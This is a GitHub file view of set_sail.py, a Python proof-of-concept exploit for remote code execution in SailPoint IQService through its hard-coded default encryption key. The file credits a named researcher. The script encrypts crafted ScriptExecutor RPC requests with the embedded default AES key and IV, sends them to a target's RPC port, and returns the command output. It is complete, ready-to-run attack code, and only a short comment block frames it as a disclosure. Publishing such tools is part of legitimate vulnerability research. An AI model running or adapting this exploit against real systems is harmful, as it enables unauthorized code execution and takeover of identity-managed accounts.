-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathset_sail.py
More file actions
291 lines (230 loc) · 10.6 KB
/
set_sail.py
File metadata and controls
291 lines (230 loc) · 10.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
#!/usr/bin/env python3
########################################################################################################################
# SailPoint IQService up to and including version IQService-Feb-2025 is affected by a Remote Code Execution
# vulnerability. The default configuration for the IQService RPC Server relies on a hard-coded encryption key to prevent
# unauthorized requests. User authentication is not required by default. An attacker who knows this key can send a
# crafted request to the service to execute arbitrary code. Due to the application's role in Identity and Access
# Management, additional requests can be used to compromise managed accounts beyond the application itself.
########################################################################################################################
# Title: SailPoint IQService - RCE via Default Encryption Key
# Researcher: Jason Juntunen (@missing0x00) https://github.com/missing0x00
# Software Link: https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/intro.html
# Version: SailPoint IQService-Feb-2025
########################################################################################################################
import argparse
import logging
import re
import socket
import ssl
import sys
from base64 import b64encode, b64decode
from xml.sax.saxutils import escape,unescape
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
try:
import coloredlogs
except ImportError:
coloredlogs = None
global args
global log
def do_decrypt(**kwargs):
"""Base64 decode, extract IV, AES decrypt"""
enc_bytes = kwargs['enc_bytes']
key = kwargs['key']
enc_bytes_str = str(enc_bytes)
log.info(f'Decrypting {kwargs["label"]}')
log.debug(kwargs)
decoded_string = b64decode(enc_bytes)
try:
iv = decoded_string[:16] # First 16 bytes == IV
decoded_string = decoded_string[16:]
aes = AES.new(key, AES.MODE_CBC, iv)
decrypted_bytes = unpad(aes.decrypt(decoded_string), 16)
return decrypted_bytes
except Exception as e:
log.error(enc_bytes_str + ' | Decrypt failure | ' + str(e))
pass
def do_encrypt(clear_bytes, key, iv, **kwargs):
"""AES encrypt bytes, prepend IV, base64 encode"""
log.info(f'Encrypting {kwargs["label"]}')
log.debug(f'{clear_bytes}, {key}, {iv}')
aes = AES.new(key, AES.MODE_CBC, iv)
log.debug(f'Key: {key} Bytes: {clear_bytes}')
log.debug(f'Padded bytes: {pad(clear_bytes, 16)}')
encrypted = iv + aes.encrypt(pad(clear_bytes, 16))
encoded = b64encode(encrypted).decode()
log.debug(f'Encrypted_Base64: {encoded}')
return encoded
def build_payload(**kwargs):
"""Create RpcRequest and RPC header, encrypt and encode, return final payload"""
log.info('Building payload...')
log.debug(kwargs)
if args.check and args.check is True:
# Send DoNothing XML to only verify encryption
xml_str = '<RpcRequest service="ADConnector" method="DoNothing" version="1.0"/>'
log.warning(f'Sending DoNothing request')
elif args.xml:
# Use provided XML file for XML-RPC request
xml_str = open(args.xml, "r").read()
log.warning(f'Sending XML-RPC payload from {args.xml}')
else:
command = kwargs['command']
request_id = '0000000000000000'
output_file = f'Script_{request_id}.tmp' # Output filename, server should delete after running
script_source = f'{command}>{output_file}&0' # Intentionally cause error with "&0" to get output
log.warning(f'Full command: {script_source}')
script_source = escape(script_source) # Escape special XML chars
# XML RpcRequest for command execution
xml_str = \
f'''<RpcRequest service="ScriptExecutor" method="runBeforeScript" requestId="{request_id}">
<Arguments>
<Map>
<entry key="Application"><value><Attributes/></value></entry>
<entry key="preScript">
<value>
<Rule>
<Source>{script_source}</Source>
</Rule>
</value>
</entry>
<entry key="Request"><value><AccountRequest/></value></entry>
</Map>
</Arguments>
</RpcRequest>'''
xml_bytes = bytes(xml_str, "utf8")
log.debug(f'Payload XML: {xml_bytes}')
key = kwargs['key']
iv = kwargs['iv']
enc_xml = do_encrypt(clear_bytes=xml_bytes, key=key, iv=iv, label="xml_bytes")
# RPC PayloadHeader: packetId, version, type, payloadSize
payload_length = str(len(enc_xml)).zfill(10)
header = f'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 2.0, rpc, {payload_length}'
header = bytes(header, 'utf-8')
# Same key for both to keep it simple
enc_header = do_encrypt(clear_bytes=header, key=key, iv=iv, label="payload_header")
enc_session_key = do_encrypt(clear_bytes=key, key=key, iv=iv, label="session_key")
enc_key_len = str(len(enc_session_key)).zfill(4)
# Combine everything into the final payload
# Start with 'C' or '$' to indicate CBC
payload_string = f'C{enc_key_len}{enc_session_key}{enc_header}\n{enc_xml}'
log.debug(f'Payload string: {payload_string}')
payload_bytes = bytes(payload_string, 'utf-8')
return payload_bytes
def process_response(response, key, **kwargs):
"""Split and decrypt response using server-provided key"""
log.info('Response received, processing...')
try:
enc_response_header, enc_response_body = response.split(b'\r\n', 1)
log.debug(b'Encrypted response header: ' + enc_response_header)
log.debug(b'Encrypted response body: ' + enc_response_body)
# Decrypt header portion using key
decrypted_header = do_decrypt(enc_bytes=enc_response_header, key=key, label='response_header', **kwargs)
# Use decrypted header as new key for body
decrypted_body = do_decrypt(enc_bytes=enc_response_body, key=decrypted_header, label='response_body', **kwargs)
except Exception as e:
log.error(e)
log.debug(b'Full response: ' + response)
decrypted_body = do_decrypt(enc_bytes=response, key=key, label='full_response_body', **kwargs)
pass
if args.check and args.check is True:
if decrypted_body is not None and b'RpcResponse' in decrypted_body:
log.debug(f'decrypted_body: {decrypted_body}')
print(f'VULNERABLE\t{args.target}:{args.port}')
else:
log.error('Unexpected response, may not be vulnerable')
sys.exit()
body_str = decrypted_body.decode("utf8")
log.warning(body_str)
if '<String>' in body_str:
response_str = re.split('<String>|</String>', body_str)[1]
else:
response_str = body_str
return response_str
def do_exploit(**kwargs):
"""Execute command on target using ScriptExecutor"""
command = kwargs['command']
use_ssl = kwargs['use_ssl']
# Build and encrypt payload
payload = build_payload(**kwargs)
payload_size = len(payload)
# Open TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if use_ssl:
s = ssl.wrap_socket(s)
try:
s.connect((args.target, args.port))
except Exception as e:
log.error(e)
raise sys.exit()
# Send prepared payload to RPC server
log.info('Sending RpcRequest')
log.warning(f'{str(payload_size)} bytes to tcp://{args.target}:{args.port}')
s.send(payload)
# Receive response from RPC server
response = b''
while True:
try:
r = s.recv(4)
if not r:
break
response += r
except Exception as e:
log.error(e)
# Decrypt and parse response
processed_response = process_response(response, key=args.key)
# Command output follows "Before Script returned non-zero exit code : 1 : "
# Results may also be XML character encoded
if ': 1 :' in processed_response:
cmd_out = re.split(': 1 :', processed_response)[1]
cmd_out = unescape(cmd_out.strip())
print(f'>>> {command}\n{cmd_out}')
else:
log.error(processed_response)
cmd_out = processed_response
return cmd_out
def configure_logging(verbosity):
global log
log = logging.getLogger(__name__)
log_level = {
0: logging.ERROR,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG
}
log.setLevel(log_level[verbosity])
if coloredlogs:
coloredlogs.install(logger=log, level=log_level[verbosity],
fmt="%(asctime)s | %(lineno)s:%(funcName)s() | %(message)s")
else:
log.warning(f'For more logging: pip3 install coloredlogs')
def main():
global args
default_key_str = '445a343241355532424f503057543256'
default_iv_str = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('target', help='Target server address', type=str)
parser.add_argument('-p', dest='port', help='Target IQService RPC port (default: %(default)s)', type=int,
default='5050')
parser.add_argument('-c', dest='command', help='Command to run (default: %(default)s)', type=str, default='whoami', nargs='?')
parser.add_argument('-k', dest='key', help='AES key as hex string (default: %(default)s)',
default=default_key_str, type=str, nargs='?')
parser.add_argument('-i', dest='iv', help='AES IV as hex string (default: %(default)s)',
default=default_iv_str, type=str, nargs='?')
parser.add_argument('--ssl', dest='use_ssl', help='Use SSL/TLS for TCP connection', action='store_true')
parser.add_argument('--check', dest='check', help='Send test payload to verify default key', action='store_true')
parser.add_argument('-x', dest='xml', help='XML file for custom RPC payload', type=str)
parser.add_argument('-v', dest='verbosity', action='count', default=0,
help="Increase output verbosity, use -vv or -vvv for more (requires coloredlogs)")
parser.set_defaults(func=do_exploit)
try:
args = parser.parse_args()
configure_logging(args.verbosity)
log.debug(args)
args.key = bytes.fromhex(args.key)
args.iv = bytes.fromhex(args.iv)
args.func(**vars(args))
except Exception as e:
log.critical(e)
sys.exit(0)
if __name__ == "__main__":
main()